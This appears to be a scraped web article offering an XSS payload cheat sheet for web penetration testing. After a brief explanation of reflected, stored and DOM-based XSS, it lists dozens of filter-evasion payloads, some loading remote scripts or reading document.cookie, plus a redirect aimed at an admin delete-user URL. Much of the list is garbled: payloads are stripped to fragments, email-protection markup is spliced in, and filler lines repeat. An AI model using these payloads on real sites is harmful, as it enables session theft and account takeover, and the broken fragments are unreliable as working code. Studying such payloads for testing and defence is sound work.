Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing

XSS is a very commonly exploited vulnerability type which is very widely spread and easily detectable. Here we are going to see about most important XSS Cheat Sheet.

What is XSS(Cross Site Scripting)? An attacker can inject untrusted snippets of JavaScript into your application without validation. This JavaScript is then executed by the victim who is visiting the target site. XSS classified into three types and these XSS Cheat Sheet will help to find the XSS vulnerabilities for Pentesters.

Reflected XSS
Stored XSS
DOM-Based XSS

In Reflected XSS, an attacker sends the victim a link to the target application through email, social media, etc. This link has a script embedded within it which executes when visiting the target site.
In Stored XSS, the attacker is able to plant a persistent script in the target website which will execute when anyone visits it.
With DOM Based XSS, no HTTP request is required, the script is injected as a result of modifying the DOM of the target site in the client side code in the victim’s browser and is then executed.

You can Also Learn Advanced Web Hacking & Penetration Testing Course – Scratch to Advance.

Most Important XSS Cheat Sheet


 $CLICKME$   $CLICKME$ 




 
XXX












 



alert("XSS")'); ?>

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

  +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-






PT SRC="http://ha.ckers.org/xss.js">
XSS
XSS
XSS
XSS
XSS
XSS

<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<sVg><scRipt >alert&lpar;1&rpar; {Opera}
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript&colon;confirm(1)"
<img src=``&NewLine; onerror=alert(1)&NewLine;
<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
"><h1/onmouseover='u0061lert(1)'>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<form><a href="javascript:u0061lert(1)">X
</script><img/*/src="worksinchrome&colon;prompt(1)"/*/onerror='eval(src)'>
<img/	
&#11; src=`~` onerror=prompt(1)>
<form><iframe 	
&#11; src="javascript:alert(1)"&#11;
	;>
<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
&#11;>X</a
http://www.google<script .com>alert(document.location)</script
<a href=[&#00;]"&#00; onmouseover=prompt(1)//">XYZ</a
<img/<a href="https://gbhackers.com/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="057677663845">[email protected]</a> 
 onerror = prompt('1')
<style/onload=prompt('XSS')</pre>
<pre class="wp-block-preformatted"><script ^__^>alert(String.fromCharCode(49))</script ^__^
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
&#00;</form><input type="date" onfocus="alert(1)">
<form><textarea 
 onkeyup='u0061u006Cu0065u0072u0074(1)'>
<script /***/>/***/confirm('uFF41uFF4CuFF45uFF52uFF54u1455uFF11u1450')/***/</script /***/
<iframe srcdoc='<body onload=prompt&lpar;1&rpar;>'>
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=<!--	>
alert
&lpar;1&rpar;>
<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
"><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

<blink/
 onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe// src=javaSCRIPT&colon;alert(1)
//<form/action=javascript:alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/<a href="https://gbhackers.com/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="a2d1d0c19fe2">[email protected]</a>"/onload=prompt(1) /*iframe/src*/>
//|\ <script //|\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\ </script //|\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript:
 javascript:prompt(1)"><input type="X">
</plaintext></|><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
<a href="javascript&colon;u0061l&#038;#101%72t&lpar;1&rpar;"><button>
<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
<img decoding="async" src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src //onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29>



 $click$ 

alert(1)>

 --!>

x
">

Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing

Most Important XSS Cheat Sheet

XSS

XSS by xss

XSS by xss

XSS by xss

XSS by xss

XSS by xss

XSS by xss

XSS by xss

123

123

123

Hover the cursor to the LEFT of this Message

">123

123